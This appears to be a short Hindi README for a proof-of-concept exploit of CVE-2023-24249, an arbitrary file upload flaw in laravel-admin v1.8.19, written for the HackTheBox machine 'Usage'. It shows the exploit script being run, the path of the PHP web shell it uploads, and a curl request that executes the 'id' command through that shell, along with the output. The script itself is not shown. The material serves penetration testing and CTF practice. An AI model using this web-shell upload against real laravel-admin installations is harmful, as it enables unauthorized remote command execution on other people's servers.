
प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट CVE-2023-24249 के लिए, laravel-admin में एक मनमानी फ़ाइल अपलोड भेद्यता, जो पेनिट्रेशन टेस्टिंग और CTF चुनौतियों के लिए वेब शैल परिनियोजन को सक्षम बनाता है।
CVE-2023-24249 laravel-admin v1.8.19 में एक मनमानी फ़ाइल अपलोड भेद्यता है। यह प्रूफ ऑफ कॉन्सेप्ट भेद्यता का शोषण करके एक वेब शैल अपलोड करता है।
यह एक्सप्लॉइट HackTheBox की आसान मशीन Usage के विरुद्ध उपयोग के लिए लिखा गया था।
python3 CVE-2023-24249.py
[+] Web shell uploaded to http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php
curl http://admin.usage.htb/uploads/images/df18111ffa9f40264b52624c7d7d21b1.php?c=id
uid=1000(dash) gid=1000(dash) groups=1000(dash)